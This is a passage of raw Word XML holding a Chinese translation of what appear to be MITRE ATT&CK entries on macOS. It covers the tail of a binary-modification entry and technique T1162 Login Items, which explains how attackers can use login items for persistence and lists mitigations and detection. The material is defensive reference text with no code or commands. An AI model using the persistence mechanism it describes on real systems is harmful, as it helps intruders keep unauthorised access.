          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="425AB68A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7618" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2D19939E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00FF6876" w14:paraId="7FBDE093" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56E45B2A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>审计</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="118A3FCA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:t>也可以根据它们所需的动态库对二进制文件进行基线化，如果应用需要一个新的动态库，该库是作为更新的一部分，则应对此进行调查</w:t>
            </w:r>
            <w:r w:rsidRPr="00FF6876">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00FF6876" w14:paraId="7EC5038A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="325D7073" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:t>代码签名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45AFA7CB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:t>强制使用正确的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FF6876">
              <w:t xml:space="preserve"> Apple </w:t>
            </w:r>
            <w:r w:rsidRPr="00FF6876">
              <w:t>开发人员代码对所有二进制文件进行签名。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00FF6876" w14:paraId="420B41B3" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6725BB71" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:t>执行预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D94D710" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:t>通过已知哈希将应用程序列入白名单。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44E45568" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AD4768" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C90B2D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r w:rsidRPr="00C90B2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视进程可用于修改二进制标头的。监视文件系统，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00C90B2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应用程序二进制文件和无效校验和</w:t>
      </w:r>
      <w:r w:rsidRPr="00C90B2D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00C90B2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>签名的更改。对与应用程序更新或修补程序不一致而对二进制文件的更改也非常可疑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40992557" w14:textId="7927C6E4" w:rsidR="000F2665" w:rsidRDefault="008069DA" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录项</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="5EFBA12D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E3A5C29" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A2891" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2891">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve"> T1162</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FEE7DC4" w14:textId="0FC78075" w:rsidR="000F2665" w:rsidRPr="007A2891" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B5B9F1E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A2891" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2891">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve"> macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34F436B6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A2891" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2891">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17E3C4DA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A2891" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2891">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1803A5C8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2891">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76632C09" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="559D5CAA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6876">
        <w:t xml:space="preserve">MacOS </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6876">
        <w:t>提供</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6876">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6876">
        <w:t>用户登录时要运行的特定应用程序的选项。这些应用程序在登录的用户的上下文中运行，并且将在每次用户登录时启动。使用服务管理框架安装的登录项在系统首选项中不可见，并且只能由创建它们的应用程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6876">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6876">
        <w:t>。用户可以直接控制使用共享文件列表安装的登录项目，该文件列表在系统首选项中也可见。这些登录项存储在用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>~/Library/Preferences/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>目录中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> plist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>，该文件命名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>com.apple.loginitems.plist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>。其中一些应用程序可以向用户打开可见对话框，但不必都打开，因</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6876">
        <w:t>为有</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6876">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6876">
        <w:t>隐藏</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6876">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6876">
        <w:t>窗口的选项。如果攻击者可以注册自己的登录项或修改现有登录项，则每次用户登录时，他们都可以使用它来执行其持久性机制的代码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6876">
        <w:t xml:space="preserve">API </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6876">
        <w:t>方</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>SMLoginItemSetEnabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>可用于设置登录项，但脚本语言（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00180CD1">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>AppleScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00180CD1">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>也可以执行此操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F8C84B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3570"/>
        <w:gridCol w:w="6166"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="1667D91D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="391"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3570" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="33289341" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00BC3092" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="39434C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6166" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="36A5EC52" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00BC3092" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="39434C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="2BAE201B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2900E06A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00180CD1">
              <w:rPr>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>用户帐户管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6166" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21AE02CC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>限制用户创建自己的登录项目</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="68426187" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52127709" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00180CD1">
              <w:rPr>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>用户培训</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6166" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="296D7C32" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>登录时按住移位键可防止应用自动打开</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55A4704D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20752845" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00473BCD" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>您</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>通过访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">Apple </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>菜单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>系统首选项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>用户和组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>登录项目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>来查看共享文件列表创建的所有登录项目。对于已知良好的应用程序，应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>此区域（和相应的文件位置）并列出白名单。否则，登录项位于应用程序捆绑包中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>Contents/Library/LoginItems</w:t>
      </w:r>
      <w:r>
        <w:rPr>
